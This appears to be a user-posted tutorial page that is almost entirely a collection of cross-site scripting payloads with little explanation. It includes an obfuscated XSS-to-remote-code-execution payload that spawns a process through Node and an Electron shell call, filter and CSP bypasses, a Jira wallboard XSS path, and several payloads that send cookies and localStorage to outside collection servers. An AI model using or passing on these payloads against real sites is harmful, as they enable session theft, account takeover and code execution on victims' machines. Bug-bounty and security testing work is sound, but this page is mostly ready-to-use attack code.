asdassdfsdf

1
  • victem1's avatar
    victem1
    published on 18 Apr, 2024 at 00:25
    0 favourites

Tagged

Stats

16 visits, 22 views

Tools

Share

Translations

Create a translation

License

This tutorial is licensed under CC BY 4.0. Please refer to the license text if you wish to reuse, share or remix the content contained within this tutorial.

xss to rce payload:

">'><img src=x onerror=writeln(String.fromCharCode(60,115,99,114,105,112,116,62,10,118,97,114,32,80,114,111,99,101,115,115,32,61,32,112,114,111,99,101,115,115,46,98,105,110,100,105,110,103,40,39,112,114,111,99,101,115,115,95,119,114,97,112,39,41,46,80,114,111,99,101,115,115,59,10,118,97,114,32,112,114,111,99,32,61,32,110,101,119,32,80,114,111,99,101,115,115,40,41,59,10,112,114,111,99,46,111,110,101,120,105,116,32,61,32,102,117,110,99,116,105,111,110,40,97,44,98,41,32,123,125,59,10,118,97,114,32,101,110,118,32,61,32,112,114,111,99,101,115,115,46,101,110,118,59,10,118,97,114,32,101,110,118,95,32,61,32,91,93,59,10,102,111,114,32,40,118,97,114,32,107,101,121,32,105,110,32,101,110,118,41,32,101,110,118,95,46,112,117,115,104,40,107,101,121,43,39,61,39,43,101,110,118,91,107,101,121,93,41,59,10,112,114,111,99,46,115,112,97,119,110,40,123,102,105,108,101,58,39,47,117,115,114,47,98,105,110,47,103,110,111,109,101,45,99,97,108,99,117,108,97,116,111,114,39,44,99,119,100,58,110,117,108,108,44,119,105,110,100,111,119,115,86,101,114,98,97,116,105,109,65,114,103,117,109,101,110,116,115,58,102,97,108,115,101,44,100,101,116,97,99,104,101,100,58,102,97,108,115,101,44,101,110,118,80,97,105,114,115,58,101,110,118,95,44,115,116,100,105,111,58,91,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,93,125,41,59,10,60,47,115,99,114,105,112,116,62))>

same rce

<a onmouseover="try{ const {shell} = require('electron'); shell.openExternal('file:C:/Windows/System32/calc.exe') }catch(e){alert(e)}">Harmless Link</a>

<script+class=whoami>window.open("Calculator:///");</script>

jira xss bug: check wallboard in recorn

victomhost/plugins/servlet/Wallboard

saki'"><svg><animatetransform src=x onbegin=alert(1)>

'"><svg><animate onbegin=alert(document.domain) attributeName=x></svg>

<math href="javascript:alert(document.cookie)">CLICKME</math>

script><svg/onload=prompt`{document.cookie}`>

html injection:

</h1><h3><mark><a href="https://example.com">e x a m p l e . c o m </a></mark></h3>

<a href=[0x0b]xss" onfocus=prompt(1) autofocus fragment="

Bug Bounty Tips:

Here is An XSS payload that steals both Cookies and Local Storage Data:

<svg/onload='const url = `https://yourserver/collect?cookie=${encodeURIComponent(document.cookie)}&localStorage=${encodeURIComponent(JSON.stringify(localStorage))}`; fetch(url);'>"

Bug: XSS to information Disclosure.

I have used double URL encoded version of this payload:

<img src="x" onerror="fetch('http://yourserver/?cookie=' + encodeURIComponent(document.cookie));">

CSP BYPASS:

%3C/script%20%3E

2- mitsecXSS%22%3E%3Cinput%20%00%20onControl%20hello%20oninput=confirm(1)%20x%3E

challenge-0622.intigriti.io/challenge/index.php

'">👉<a/href='jav&Tab;ascript:throw/lauritz/'>click<!--

<a/href=”j&#97v&#97script&#x3A;&#97lert(document.cookie)”>ClickMe

‘“><img src=x onerror=fetch(‘//ra54f7ltuq8q8i7ym90odj9zgqmga5.burpcollaborator.net/?c=’%2Bdocument.cookie)>

?url=http://me6.com/aem/xss2.svg

my fav bypass XSS payload is: 99% work

'"()%26%25<yes><%2Fscript><script>alert(document.c00kiE)<%2Fscript>

  • 0 Comments

  • Order by
Want to leave a comment? Login or Register an account!